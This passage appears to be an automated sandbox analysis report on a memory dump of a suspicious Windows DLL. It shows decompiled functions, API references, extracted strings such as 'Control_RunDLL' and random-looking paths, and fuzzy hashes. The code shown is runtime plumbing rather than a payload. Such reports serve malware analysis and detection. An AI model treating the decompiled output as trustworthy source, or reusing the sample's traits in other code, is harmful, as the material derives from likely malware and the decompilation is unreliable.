													_t158 =  &(_t158[1]);
													__eflags = _v60 - 1;
													_a4 = 0;
													if(_v60 == 1) {
														L24:
														_t135[2] = 0x6e47e0bc;
														_t135[1] = 0x1502;
														goto L8;
													} else {
														_t114 = _v52;
														_t91 = _v56;
														__eflags = _t114 - _t96;
														 *_t158 = _t114;
														if(_t114 != _t96) {
															L46:
															_t101 =  &_v24;
															_t119 = _t160;
															_v48 = 0;
															_push(0x6e47e0d4);
															_push( &_v48);
															goto L48;
														} else {
															_t156 =  &_v48;
															_push(_t96);
															_push(_t91);
															L6E442620(_t96, _t156, _t133, _t133, _t135);
															_t160 =  &(_t158[2]);
															__eflags = _v48 - 1;
															if(_v48 != 1) {
																_t93 = _v44;
																 *_t160 = _t96;
																__eflags = _t93 - _t96;
																_v20 = _t93;
																if(_t93 != _t96) {
																	_t101 =  &_v20;
																	_t119 = _t160;
																	_v48 = 0;
																	_push(0x6e47e0e4);
																	_push(_t156);
																	L48:
																	E6E4573F0(_t96, _t101, _t119, _t133);
																	asm("ud2");
																	L50();
																	_t120 = _t135;
																	__eflags = _t101 - 0x46a;
																	if(_t101 > 0x46a) {
																		__eflags = _t101 - 0x271c;
																		if(_t101 <= 0x271c) {
																			__eflags = _t101 - 0x1715;
																			if(_t101 > 0x1715) {
																				__eflags = _t101 - 0x1f4d;
																				if(_t101 > 0x1f4d) {
																					__eflags = _t101 - 0x1f4e;
																					if(_t101 == 0x1f4e) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x2022;
																						if(_t101 == 0x2022) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x25e9;
																							if(_t101 != 0x25e9) {
																								goto L106;
																							} else {
																								goto L93;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x1716;
																					if(_t101 == 0x1716) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x1b64;
																						if(_t101 == 0x1b64) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x1b80;
																							if(_t101 == 0x1b80) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x4cf;
																				if(_t101 > 0x4cf) {
																					__eflags = _t101 - 0x4d0;
																					if(_t101 == 0x4d0) {
																						return 4;
																					} else {
																						__eflags = _t101 - 0x50f;
																						if(_t101 == 0x50f) {
																							return 0x1a;
																						} else {
																							__eflags = _t101 - 0x5b4;
																							if(_t101 == 0x5b4) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x46b;
																					if(_t101 == 0x46b) {
																						return 0x1e;
																					} else {
																						__eflags = _t101 - 0x476;
																						if(_t101 == 0x476) {
																							return 0x20;
																						} else {
																							__eflags = _t101 - 0x4cf;
																							if(_t101 != 0x4cf) {
																								goto L106;
																							} else {
																								return 5;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t144 = _t101 - 0x271d;
																			__eflags = _t144 - 0x34;
																			if(_t144 <= 0x34) {
																				goto __edx;
																			}
																			__eflags = _t101 - 0x3c2a - 2;
																			if(_t101 - 0x3c2a < 2) {
																				goto L93;
																			} else {
																				__eflags = _t101 - 0x35ed;
																				if(_t101 == 0x35ed) {
																					goto L93;
																				} else {
																					goto L106;
																				}
																			}
																		}
																	} else {
																		__eflags = _t101 - 0xb6;
																		if(_t101 > 0xb6) {
																			__eflags = _t101 - 0x10a;
																			if(_t101 <= 0x10a) {
																				__eflags = _t101 - 0xde;
																				if(_t101 <= 0xde) {
																					__eflags = _t101 - 0xb7;
																					if(_t101 == 0xb7) {
																						return 0xc;
																					} else {
																						__eflags = _t101 - 0xce;
																						if(_t101 != 0xce) {
																							goto L106;
																						} else {
																							return 0x21;
																						}
																					}
																				} else {
																					__eflags = _t101 - 0xdf;
																					if(_t101 == 0xdf) {
																						return 0x1b;
																					} else {
																						__eflags = _t101 - 0xe8;
																						if(_t101 == 0xe8) {
																							return 0xb;
																						} else {
																							__eflags = _t101 - 0x102;
																							if(_t101 == 0x102) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _t101 - 0x3e2;
																				if(_t101 > 0x3e2) {
																					__eflags = _t101 - 0x3e3;
																					if(_t101 == 0x3e3) {
																						goto L93;
																					} else {
																						__eflags = _t101 - 0x41d;
																						if(_t101 == 0x41d) {
																							goto L93;
																						} else {
																							__eflags = _t101 - 0x461;
																							if(_t101 == 0x461) {
																								goto L93;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				} else {
																					__eflags = _t101 - 0x10b;
																					if(_t101 == 0x10b) {
																						return 0xe;
																					} else {
																						__eflags = _t101 - 0x150;
																						if(_t101 == 0x150) {
																							return 0xf;
																						} else {
																							__eflags = _t101 - 0x252;
																							if(_t101 == 0x252) {
																								L93:
																								return 0x16;
																							} else {
																								goto L106;
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t101 = _t101 + 0xfffffffe;
																			__eflags = _t101 - 0xa8;
																			if(_t101 <= 0xa8) {
																				_t120 = _t120 +  *((intOrPtr*)(0x6e4422a8 + _t101 * 4));
																				goto __edx;
																			}
																			L106:
																			return 0x28;
																		}
																	}
																} else {
																	L38:
																	_t57 = 0;
																	_t135[1] = 1;
																	 *_t135 = 0;
																	goto L9;
																}
															} else {
																asm("movsd xmm0, [esp+0x14]");
																asm("movsd [esi+0x4], xmm0");
																L40:
																_t57 = 1;
																 *_t135 = 1;
																goto L9;
															}
														}
													}
												}
											} else {
												_t135[1] = 1;
												L5:
												 *_t135 = 0;
												goto L9;
											}
										}
									}
								}
							}
						} else {
							_t57 = GetLastError();
							L7:
							_t135[1] = 0;
							_t135[2] = _t57;
							L8:
							 *_t135 = 1;
							L9:
							return _t57;
						}
					}
				}
			}

0x6e441da0
0x6e441da1
0x6e441da2
0x6e441da4
0x6e441da7
0x6e441dab
0x6e441daf
0x6e441dce
0x00000000
0x6e441db1
0x6e441db1
0x6e441db5
0x6e441dbd
0x6e441ddd
0x00000000
0x6e441dbf
0x6e441dbf
0x6e441dc4
0x6e441dfe
0x6e441e08
0x6e441e0e
0x6e441e10
0x6e441e69
0x6e441e6b
0x00000000
0x6e441e71
0x6e441e71
0x6e441e83
0x6e441e89
0x6e441e8b
0x6e441f05
0x6e441f0b
0x6e441f0b
0x6e441f0d
0x6e441e8d
0x6e441e8d
0x6e441e91
0x6e441e93
0x6e441e93
0x6e441f12
0x6e441f14
0x6e441f17
0x00000000
0x6e441f17
0x6e441e12
0x6e441e16
0x6e441e1a
0x6e441e1c
0x6e441e97
0x6e441ea8
0x6e441eab
0x6e441eac
0x6e441eb1
0x6e441eb4
0x6e441eb9
0x6e441f1f
0x6e441f23
0x00000000
0x6e441ebb
0x6e441ebb
0x6e441ec0
0x6e441f99
0x6e441f9c
0x6e441f9c
0x6e441fa3
0x6e441fa6
0x6e441fdb
0x6e441fdb
0x6e441fe2
0x00000000
0x6e441fa8
0x6e441fa8
0x6e441faa
0x00000000
0x6e441fac
0x6e441fac
0x6e441fb0
0x6e441fb2
0x00000000
0x6e441fb2
0x6e441faa
0x00000000
0x6e441ec6
0x6e441ec6
0x6e441eca
0x6e441ecc
0x6e442035
0x6e442037
0x6e442039
0x00000000
0x6e441ed2
0x6e441ed6
0x6e441eda
0x6e441edb
0x6e441ee0
0x6e441ee5
0x6e441eea
0x6e441f27
0x6e441f2b
0x6e441f2c
0x6e441f2d
0x6e441f32
0x00000000
0x6e441f32
0x6e441ecc
0x6e441ec0
0x6e441e1e
0x6e441e1e
0x6e441e20
0x6e442004
0x6e442009
0x6e44200c
0x6e44200e
0x6e44201d
0x6e442022
0x6e442025
0x00000000
0x6e441e26
0x6e441e26
0x6e441e28
0x6e441e31
0x6e441e34
0x6e441eee
0x00000000
0x6e441e3a
0x6e441e3a
0x6e441e41
0x6e441e43
0x6e441e46
0x6e441e4a
0x6e441e51
0x6e441e53
0x6e441e57
0x6e441f3a
0x6e441f3d
0x6e441f40
0x6e442027
0x6e442027
0x6e442029
0x6e44202e
0x6e44203e
0x6e44203e
0x6e442043
0x6e442046
0x00000000
0x6e441f46
0x6e441f4c
0x6e441f4d
0x6e441f52
0x6e441f55
0x6e441f5a
0x6e441f5e
0x6e441ef2
0x6e441ef2
0x6e441ef9
0x00000000
0x6e441f60
0x6e441f60
0x6e441f64
0x6e441f68
0x6e441f6a
0x6e441f6d
0x6e442048
0x6e442048
0x6e44204c
0x6e44204e
0x6e442056
0x6e44205f
0x00000000
0x6e441f73
0x6e441f73
0x6e441f7b
0x6e441f7c
0x6e441f7d
0x6e441f82
0x6e441f85
0x6e441f8a
0x6e441fb8
0x6e441fbc
0x6e441fbf
0x6e441fc1
0x6e441fc5
0x6e442062
0x6e442066
0x6e442068
0x6e442070
0x6e442075
0x6e442076
0x6e442076
0x6e44207e
0x6e442081
0x6e442086
0x6e442089
0x6e44208f
0x6e4420b5
0x6e4420bb
0x6e4420d9
0x6e4420df
0x6e442152
0x6e442158
0x6e44220e
0x6e442214
0x00000000
0x6e442216
0x6e442216
0x6e44221c
0x00000000
0x6e44221e
0x6e44221e
0x6e442224
0x00000000
0x00000000
0x00000000
0x00000000
0x6e442224
0x6e44221c
0x6e44215e
0x6e44215e
0x6e442164
0x00000000
0x6e44216a
0x6e44216a
0x6e442170
0x00000000
0x6e442176
0x6e442176
0x6e44217c
0x00000000
0x6e442182
0x00000000
0x6e442182
0x6e44217c
0x6e442170
0x6e442164
0x6e4420e1
0x6e4420e1
0x6e4420e7
0x6e4421d0
0x6e4421d6
0x6e442251
0x6e4421d8
0x6e4421d8
0x6e4421de
0x6e4422a1
0x6e4421e4
0x6e4421e4
0x6e4421ea
0x00000000
0x6e4421ec
0x00000000
0x6e4421ec
0x6e4421ea
0x6e4421de
0x6e4420ed
0x6e4420ed
0x6e4420f3
0x6e44228d
0x6e4420f9
0x6e4420f9
0x6e4420ff
0x6e442291
0x6e442105
0x6e442105
0x6e44210b
0x00000000
0x6e442111
0x6e442114
0x6e442114
0x6e44210b
0x6e4420ff
0x6e4420f3
0x6e4420e7
0x6e4420bd
0x6e4420bd
0x6e4420c3
0x6e4420c6
0x6e4420d3
0x6e4420d3
0x6e4421be
0x6e4421c1
0x00000000
0x6e4421c3
0x6e4421c3
0x6e4421c9
0x00000000
0x6e4421cb
0x00000000
0x6e4421cb
0x6e4421c9
0x6e4421c1
0x6e442091
0x6e442091
0x6e442097
0x6e442115
0x6e44211b
0x6e442187
0x6e44218d
0x6e442232
0x6e442238
0x6e442249
0x6e44223a
0x6e44223a
0x6e442240
0x00000000
0x6e442242
0x6e442245
0x6e442245
0x6e442240
0x6e442193
0x6e442193
0x6e442199
0x6e44229d
0x6e44219f
0x6e44219f
0x6e4421a5
0x6e44224d
0x6e4421ab
0x6e4421ab
0x6e4421b1
0x00000000
0x6e4421b3
0x00000000
0x6e4421b3
0x6e4421b1
0x6e4421a5
0x6e442199
0x6e44211d
0x6e44211d
0x6e442123
0x6e4421f1
0x6e4421f7
0x00000000
0x6e4421f9
0x6e4421f9
0x6e4421ff
0x00000000
0x6e442201
0x6e442201
0x6e442207
0x00000000
0x6e442209
0x00000000
0x6e442209
0x6e442207
0x6e4421ff
0x6e442129
0x6e442129
0x6e44212f
0x6e442295
0x6e442135
0x6e442135
0x6e44213b
0x6e442299
0x6e442141
0x6e442141
0x6e442147
0x6e442226
0x6e442229
0x6e44214d
0x00000000
0x6e44214d
0x6e442147
0x6e44213b
0x6e44212f
0x6e442123
0x6e442099
0x6e442099
0x6e44209c
0x6e4420a2
0x6e4420a8
0x6e4420af
0x6e4420af
0x6e4422a2
0x6e4422a5
0x6e4422a5
0x6e442097
0x6e441fcb
0x6e441fcb
0x6e441fcb
0x6e441fcd
0x6e441fd4
0x00000000
0x6e441fd4
0x6e441f8c
0x6e441f8c
0x6e441f92
0x6e441fe9
0x6e441fe9
0x6e441fee
0x00000000
0x6e441fee
0x6e441f8a
0x6e441f6d
0x6e441f5e
0x6e441e5d
0x6e441e5d
0x6e441dd5
0x6e441dd5
0x00000000
0x6e441dd5
0x6e441e57
0x6e441e34
0x6e441e20
0x6e441e1c
0x6e441dc6
0x6e441dc6
0x6e441de2
0x6e441de2
0x6e441de9
0x6e441dec
0x6e441dec
0x6e441df2
0x6e441df9
0x6e441df9
0x6e441dc4
0x6e441dbd

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6E441C2E,?), ref: 6E441DB5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6E441C2E,?), ref: 6E441DC6
GetConsoleMode.KERNEL32 ref: 6E441E08
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6E441E83
GetLastError.KERNEL32(?,?,?,00000000), ref: 6E441F05

Strings

Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq, xrefs: 6E441FF5
assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed, xrefs: 6E44200E

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$ConsoleFileHandleModeWrite
String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq$assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed
API String ID: 4172320683-607870617
Opcode ID: 6065748768ae94b3b76d894e452530b8fa12923702f434399069a814c8098138
Instruction ID: b9b1c514db652d02bf5a2cb94835ab186ebe23625ff37f64ff1da8ead7dabf65
Opcode Fuzzy Hash: 6065748768ae94b3b76d894e452530b8fa12923702f434399069a814c8098138
Instruction Fuzzy Hash: 5871DFB1708341DFE7109EB5C894B9B7BE5EB86348F10882EE49687380DB71E95DCB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E43C690, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6E43C690(void* __ebx, void* __edi, void* __esi, void* _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				long _v48;
				void* __ebp;
				void* _t22;
				void* _t29;
				void* _t30;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				void* _t54;

				_t32 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_v32 = _t54 - 0x20;
				_v20 = 0xffffffff;
				_v24 = E6E443B40;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_v48 = 0;
				_push(0x6e48ada8);
				"o@,w)@,w"();
				_t47 =  *0x6e48a038; // 0x1
				_t50 =  *0x6e48a03c; // 0x0
				_v40 = 0x6e48ada8;
				_t43 = _t47 & _t50;
				if(_t43 == 0xffffffff) {
					L8:
					_v36 = _t43;
					__imp__ReleaseSRWLockExclusive(0x6e48ada8);
					_v20 = 0;
					_t22 = E6E4572E0("failed to generate unique thread ID: bitspace exhausted", 0x37, 0x6e47d270);
					goto L10;
				} else {
					 *0x6e48a038 = _t47 + 1;
					asm("adc ecx, 0x0");
					 *0x6e48a03c = _t50;
					if((_t47 | _t50) == 0) {
						_v36 = _t43;
						_v20 = 0;
						_t22 = E6E456E20(__ebx, "called `Option::unwrap()` on a `None` value", 0x2b, _t47, _t50, __eflags, 0x6e47d280);
						L10:
						asm("ud2");
						__eflags = _v36 - 0xffffffff;
						if(_v36 != 0xffffffff) {
							E6E43C870(_t22,  &_v40);
						}
						return E6E43C850( &_v48);
					} else {
						__imp__ReleaseSRWLockExclusive(0x6e48ada8);
						_t29 =  *0x6e48adc8; // 0x260000
						if(_t29 != 0) {
							L5:
							_t30 = HeapAlloc(_t29, 0, 0x20);
							if(_t30 == 0) {
								goto L7;
							} else {
								 *(_t30 + 8) = _t47;
								 *(_t30 + 0xc) = _t50;
								 *(_t30 + 0x10) = 0;
								 *((char*)(_t30 + 0x18)) = 0;
								 *_t30 = 1;
								 *(_t30 + 4) = 1;
								 *[fs:0x0] = _v28;
								return _t30;
							}
						} else {
							_t29 = GetProcessHeap();
							if(_t29 == 0) {
								L7:
								_t43 = 8;
								E6E456C30(_t32, 0x20, 8, _t47, _t50, __eflags);
								asm("ud2");
								goto L8;
							} else {
								 *0x6e48adc8 = _t29;
								goto L5;
							}
						}
					}
				}
			}

0x6e43c690
0x6e43c693
0x6e43c694
0x6e43c695
0x6e43c699
0x6e43c69c
0x6e43c6a3
0x6e43c6b4
0x6e43c6b7
0x6e43c6bd
0x6e43c6c4
0x6e43c6c9
0x6e43c6cf
0x6e43c6d5
0x6e43c6db
0x6e43c6e4
0x6e43c6e9
0x6e43c77f
0x6e43c77f
0x6e43c787
0x6e43c78d
0x6e43c7a3
0x00000000
0x6e43c6ef
0x6e43c6f6
0x6e43c6fd
0x6e43c702
0x6e43c708
0x6e43c7ad
0x6e43c7b0
0x6e43c7c6
0x6e43c7ce
0x6e43c7ce
0x6e43c7d7
0x6e43c7db
0x6e43c7e0
0x6e43c7e0
0x6e43c7f1
0x6e43c70e
0x6e43c713
0x6e43c719
0x6e43c720
0x6e43c730
0x6e43c735
0x6e43c73c
0x00000000
0x6e43c73e
0x6e43c73e
0x6e43c741
0x6e43c744
0x6e43c74b
0x6e43c74f
0x6e43c755
0x6e43c75f
0x6e43c76d
0x6e43c76d
0x6e43c722
0x6e43c722
0x6e43c729
0x6e43c76e
0x6e43c773
0x6e43c778
0x6e43c77d
0x00000000
0x6e43c72b
0x6e43c72b
0x00000000
0x6e43c72b
0x6e43c729
0x6e43c720
0x6e43c708

APIs

AcquireSRWLockExclusive.KERNEL32(6E48ADA8), ref: 6E43C6C9
ReleaseSRWLockExclusive.KERNEL32(6E48ADA8), ref: 6E43C713
GetProcessHeap.KERNEL32 ref: 6E43C722
HeapAlloc.KERNEL32(00260000,00000000,00000020), ref: 6E43C735
ReleaseSRWLockExclusive.KERNEL32(6E48ADA8), ref: 6E43C787

Strings

called `Option::unwrap()` on a `None` value, xrefs: 6E43C7B7
failed to generate unique thread ID: bitspace exhausted, xrefs: 6E43C794

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
API String ID: 1780889587-1657987152
Opcode ID: d613e4bc011ece3f5a21ee3c017dab11ea0906e2796de5ce0f830bb9165d843e
Instruction ID: cde28a646577532c888c96b90e8ba663c0f9b06d031d660d71ca36e82f2cb15e
Opcode Fuzzy Hash: d613e4bc011ece3f5a21ee3c017dab11ea0906e2796de5ce0f830bb9165d843e
Instruction Fuzzy Hash: 23310471E102158BEB549FF9D914F9EBBB5EF8A714F20812AD814AB3C0D7B4D4058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4310A0, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 141
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E4310A0(long __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, char _a8, intOrPtr _a16) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				long _v44;
				long _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				void* __ebp;
				void* _t45;
				void* _t46;
				void* _t50;
				void* _t51;
				intOrPtr _t54;
				long _t62;
				void* _t71;
				void* _t81;
				void* _t84;
				intOrPtr _t85;

				_t78 = __esi;
				_t76 = __edi;
				_t59 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t85 = _t84 - 0x30;
				_v32 = _t85;
				_v20 = 0xffffffff;
				_v24 = E6E443B00;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t45 =  *0x6e48adc8; // 0x260000
				if(_t45 != 0) {
					L3:
					_t46 = HeapAlloc(_t45, 0, 0xf);
					if(_t46 == 0) {
						goto L18;
					} else {
						asm("movsd xmm0, [0x6e47b227]");
						asm("movsd xmm1, [0x6e47b220]");
						_v40 = _t46;
						asm("movsd [eax+0x7], xmm0");
						asm("movsd [eax], xmm1");
						_t50 =  *0x6e48adc8; // 0x260000
						if(_t50 != 0) {
							L7:
							_t51 = HeapAlloc(_t50, 0, 0x10);
							if(_t51 == 0) {
								goto L19;
							} else {
								asm("movsd xmm0, [0x6e47b237]");
								asm("movsd xmm1, [0x6e47b22f]");
								_t71 = 0;
								_t59 = 0x10;
								_v52 = _t51;
								_v48 = 0x10;
								asm("movsd [eax+0x8], xmm0");
								asm("movsd [eax], xmm1");
								while(1) {
									_v44 = _t59;
									if(_t71 > 0xf) {
										break;
									}
									_t17 = _t71 + 1; // 0x1
									_t76 = _t71 + _t17;
									_t78 = _t59 - _t76;
									if(_t78 < 0) {
										_v20 = 0;
										E6E456C40(_t59, _t76, _t59, _t76, _t78, __eflags);
										asm("ud2");
										goto L18;
									} else {
										if(_t59 == _v48) {
											_v36 = _t71;
											_v56 = _t78;
											_v60 = _t76;
											_v20 = 0;
											_v64 = _t59;
											E6E456BC0( &_v52, _t59);
											_t51 = _v52;
											_t59 = _v64;
											_t71 = _v36;
											_t76 = _v60;
											_t78 = _v56;
										}
										_t10 = _t76 + 1; // 0x1
										_v36 = _t71 + 1;
										_t81 = _t51;
										E6E44AE10(_t51 + _t10, _t51 + _t76, _t78);
										_t71 = _v36;
										_t51 = _t81;
										_t85 = _t85 + 0xc;
										 *((char*)(_t81 + _t76)) = 0;
										_t59 = _t59 + 1;
										continue;
									}
									goto L21;
								}
								_v20 = 0;
								_v36 = _t51;
								E6E449770(_v40, _a4, _a8, _t51, _a16);
								__eflags = _v48;
								if(_v48 != 0) {
									HeapFree( *0x6e48adc8, 0, _v36);
								}
								HeapFree( *0x6e48adc8, 0, _v40);
								_t54 = _v28;
								 *[fs:0x0] = _t54;
								return _t54;
							}
						} else {
							_t50 = GetProcessHeap();
							if(_t50 == 0) {
								L19:
								_t62 = 0x10;
								goto L20;
							} else {
								 *0x6e48adc8 = _t50;
								goto L7;
							}
						}
					}
				} else {
					_t45 = GetProcessHeap();
					if(_t45 == 0) {
						L18:
						_t62 = 0xf;
						L20:
						E6E456C30(_t59, _t62, 1, _t76, _t78, __eflags);
						asm("ud2");
						__eflags =  &_a8;
						E6E431000(_v52, _v48);
						return E6E431000(_v40, 0xf);
					} else {
						 *0x6e48adc8 = _t45;
						goto L3;
					}
				}
				L21:
			}

0x6e4310a0
0x6e4310a0
0x6e4310a0
0x6e4310a3
0x6e4310a4
0x6e4310a5
0x6e4310a6
0x6e4310a9
0x6e4310ac
0x6e4310b3
0x6e4310c4
0x6e4310c7
0x6e4310cd
0x6e4310d4
0x6e4310e8
0x6e4310ed
0x6e4310f4
0x00000000
0x6e4310fa
0x6e4310fa
0x6e431102
0x6e43110a
0x6e43110d
0x6e431112
0x6e431116
0x6e43111d
0x6e431131
0x6e431136
0x6e43113d
0x00000000
0x6e431143
0x6e431143
0x6e43114b
0x6e431153
0x6e431155
0x6e43115a
0x6e43115d
0x6e431164
0x6e431169
0x6e431192
0x6e431195
0x6e431198
0x00000000
0x00000000
0x6e43119a
0x6e43119a
0x6e4311a0
0x6e4311a2
0x6e431235
0x6e43123c
0x6e431241
0x00000000
0x6e4311a8
0x6e4311ab
0x6e4311ad
0x6e4311b5
0x6e4311b8
0x6e4311bb
0x6e4311c2
0x6e4311c5
0x6e4311ca
0x6e4311cd
0x6e4311d0
0x6e4311d3
0x6e4311d6
0x6e4311d6
0x6e431171
0x6e431175
0x6e43117e
0x6e431180
0x6e431185
0x6e431188
0x6e43118a
0x6e43118d
0x6e431191
0x00000000
0x6e431191
0x00000000
0x6e4311a2
0x6e4311db
0x6e4311e5
0x6e4311f2
0x6e4311fa
0x6e4311fe
0x6e43120b
0x6e43120b
0x6e43121b
0x6e431220
0x6e431223
0x6e431230
0x6e431230
0x6e43111f
0x6e43111f
0x6e431126
0x6e43124a
0x6e43124a
0x00000000
0x6e43112c
0x6e43112c
0x00000000
0x6e43112c
0x6e431126
0x6e43111d
0x6e4310d6
0x6e4310d6
0x6e4310dd
0x6e431243
0x6e431243
0x6e43124f
0x6e431254
0x6e431259
0x6e431264
0x6e43126d
0x6e431283
0x6e4310e3
0x6e4310e3
0x00000000
0x6e4310e3
0x6e4310dd
0x00000000

APIs

GetProcessHeap.KERNEL32 ref: 6E4310D6
HeapAlloc.KERNEL32(00260000,00000000,0000000F), ref: 6E4310ED
GetProcessHeap.KERNEL32(00260000,00000000,0000000F), ref: 6E43111F
HeapAlloc.KERNEL32(00260000,00000000,00000010,00260000,00000000,0000000F), ref: 6E431136
HeapFree.KERNEL32(00000000,?,00000000), ref: 6E43120B
HeapFree.KERNEL32(00000000,?,00000000), ref: 6E43121B

Strings

Control_RunDLL, xrefs: 6E431102
Control_RunDLL, xrefs: 6E43114B

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocFreeProcess
String ID: Control_RunDLL$Control_RunDLL
API String ID: 2113670309-2490747307
Opcode ID: 1dc5b67209c0a000c534f80864388e9c749bd141d54a357c9db215d8a22c2f45
Instruction ID: ad51fb4cb2f12be3a2c0b0304c3bff23e2992b5affe42634b4c679605ef7376f
Opcode Fuzzy Hash: 1dc5b67209c0a000c534f80864388e9c749bd141d54a357c9db215d8a22c2f45
Instruction Fuzzy Hash: 8C515C75E006199BDF10DFF5D850FDEB7B6EF49344F20852AE804A7381D77598049BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E44C860, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6E44C897
___except_validate_context_record.LIBVCRUNTIME ref: 6E44C89F
_ValidateLocalCookies.LIBCMT ref: 6E44C928
__IsNonwritableInCurrentImage.LIBCMT ref: 6E44C953
_ValidateLocalCookies.LIBCMT ref: 6E44C9A8

Strings

csm, xrefs: 6E44C93D

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b4d0a543ab3bba1ac1a404128d7e4572106b61b5d95dbd0c0cc2ccb9f5c269a2
Instruction ID: a4d4c48df704d4196b853efe0e273332fa70489ab038e3f10d418d49761dee0d
Opcode Fuzzy Hash: b4d0a543ab3bba1ac1a404128d7e4572106b61b5d95dbd0c0cc2ccb9f5c269a2
Instruction Fuzzy Hash: C9415D34B00209EBEF00DFB9C894E9EBBA9EF45228F18855AE8145F351D7719919CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E442B10, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6E48ADB4), ref: 6E442B44
TlsAlloc.KERNEL32 ref: 6E442B5A
GetProcessHeap.KERNEL32 ref: 6E442B74
HeapAlloc.KERNEL32(00260000,00000000,0000000C), ref: 6E442B8B
ReleaseSRWLockExclusive.KERNEL32(6E48ADB4), ref: 6E442BC8

Strings

